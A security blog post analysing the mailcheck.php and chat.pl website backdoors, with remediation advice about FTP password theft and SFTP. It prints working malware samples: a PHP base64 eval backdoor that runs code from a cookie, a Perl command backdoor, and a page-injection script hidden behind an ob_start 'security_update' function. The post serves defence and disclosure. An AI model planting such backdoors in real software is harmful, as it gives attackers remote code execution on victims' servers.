WeWatchYourWebsite

"so you don't have to!"

By

Attack of mailcheck.php and chat.pl

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

<?php eval(base64_decode(‘aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9’));
echo “checking email…”;?>

 

 

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl
use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.'<script language=”javascript”>function t()…

What’s interesting about this malscript is that it uses the ‘ob_start’ function to run it’s code. ob_start is used by many WordPress sites, software galleries and other software and plugins for a large variety of websites.

This clearly shows how clever the hackers are. They’re actually using valid functions found on many websites to run their malscripts. Also by “hiding” their malscript as something that uses the words “security_update” they hope that people will overlook their code and move on to other harmful looking code instead.

What can you do if you find this on your website?

Again, this type of attack is the result of a virus that steals the FTP passwords from a PC, sends them to as server which then modifies the files on the website and adds the mailcheck.php and or the chat.pl files so they can re-infect the website after the owner has cleaned the site and changed the FTP passwords.

I recommend using WS_FTP by Ipswitch because this program does not save the stored passwords in plain text. They are encrypted which means the hackers have to do more work in order to use them. It’s not that they aren’t “hackable”, it’s just that the hackers have so many other PCs and websites that are easily hacked that right now, they probably won’t spend the time or effort in cracking the encryption.

You can also check to see if your hosting provider allows you to use SFTP instead of FTP. SFTP is encrypted traffic so a hacker’s virus can’t easily sniff the traffic and see the plain text username and password.

If you have any comments about this information or have a specific instance of a similar infection, please post your comments below.

Thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>